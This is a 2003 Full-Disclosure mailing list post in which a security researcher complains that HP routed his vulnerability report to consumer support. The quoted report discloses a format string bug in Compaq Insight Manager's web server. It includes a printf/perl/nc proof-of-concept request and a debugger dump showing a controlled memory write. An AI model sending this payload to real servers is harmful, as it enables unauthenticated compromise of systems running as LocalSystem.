> Not for [EMAIL PROTECTED] Please make sure appropriate > HP organization replies to the customer: > > [EMAIL PROTECTED] > > > Yours truly, > SOFTWARE SECURITY RESPONSE TEAM (SSRT) > Hewlett-Packard Company > HP Services .....
Okay, so this formatstring bug in WBEM Web server is not a Security issue? You can test it on your own, nearest production server or client, no matter what box you test this on, only one thing, it _must_ have Compaq Insight Manager installed. (Hint: You don't need any login/password, as this issue is in the Web server) I give a shit about this bug, i was only informing you about it, but if this sick mailing continues every time i report a SECURITY issue i have found to you, i'll never bother you againg and only post it to Full-Disclosure list.. (Same crap as last time... gah) Have a nice day /bashis > > > > Dear Compaq Customer, > > > It would help me to provide you with an accurate solution, if you could > provide the following additional details: > > * The name and model of your Compaq product, for example: Presario > 5400. > * The hardware or software that has been installed recently. > * The serial number. The serial number can be found on a sticker > attached to the side of your computer. > * The exact error message you received and the events that led to > the error (i.e., whether the error message was received after a > program was installed.) > * The operating system installed on the computer (for example: Windows > 98.) > > With the above information, I will be able to investigate the issue > further and provide you with a solution. > > Thank you for taking the time to contact us. Please reply if I can be > of further assistance. > > Regards, > > Suresh Babu Sharath > HP Consumer eSupport > > For additional or future service assistance, you can post your question > to the Customer Communities at: http://www.compaq.com/communities > > "Our advice is strictly limited to the question(s) asked and is based on > the information provided to us. HP does not assume any responsibility > or liability for the advice given and shall not be liable for any > direct, indirect, special, incidental or consequential damages in > connection with the use of this information. Always back up your data. > For more information, including technical information updates, please > visit our Web site at http://www.hp.com/go/support."; > > > Original Message Follows: > ------------------------- > > This message has been rerouted to you by the HP.COM email router. If > this message has been sent to you in error, please forward back to the > email router mailbox at REROUTER,HPCOM per HP email directory or HPCOM > REROUTER per CPQ email directory. > Original message follows: > ------------------------- > > > > Not for [EMAIL PROTECTED] Please make sure appropriate > HP organization replies to the customer: > > [EMAIL PROTECTED] > > > Yours truly, > SOFTWARE SECURITY RESPONSE TEAM (SSRT) > Hewlett-Packard Company > HP Services > > ------- Forwarded Message > > Date: Sun, 03 Aug 2003 17:03:43 +0200 > From: [EMAIL PROTECTED] > To: [EMAIL PROTECTED] > cc: [EMAIL PROTECTED] > Subject: formatstring bug in Compaq HTTP Servers > > Hi there > > There is a formatstring bug in Compaq HTTP Servers. > [in <!.DebugSearchPaths>?Url=> requests] > > The HTTP server runs with LocalSystem account. > > Versions: > All versions i have tested had this formatstring bug. > > To be shure that it wasn't allready fixed, i downloaded this new > version.. > Insight Management Agent > Version: 5.00 H (01/17/2003) > > http://www29.compaq.com/falco/sp_detail.asp?Model=4214&Div=2&Os=93&Softw > areVer= > 17022 > > Request: > $ printf "GET /<\x21.DebugSearchPaths>?Url=`perl -e 'print > "A"x14'`BBBB`perl -e > 'print > ".%%x"x1208'`%%n> HTTP/1.0\n\n" | nc 192.168.235.131 2301 > > Result: > 0:005> g > (9a8.934): Access violation - code c0000005 (first chance) > First chance exceptions are reported before any exception handling. > This exception may be expected and handled. > eax=42424242 ebx=0000006e ecx=000012eb edx=00000200 esi=00b440c0 > edi=00000800 > eip=780127a8 esp=010287f8 ebp=01028a50 iopl=0 nv up ei pl zr na > po nc > cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 > efl=00010246 > MSVCRT!setvbuf+65d: > 780127a8 8908 mov [eax],ecx > ds:0023:42424242=???????? > *** WARNING: Unable to verify checksum for > C:\PROGRA~1\Compaq\COMPAQ~1\CPQWEB~1 > \CpqHMMO.dll > *** ERROR: Symbol file could not be found. Defaulted to export symbols > for C:PROGRA~1\Compaq > \COMPAQ~1\CPQWEB~1\CpqHMMO.dll - > > Have a nice day > /bashis > > > ------- End of Forwarded Message > > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
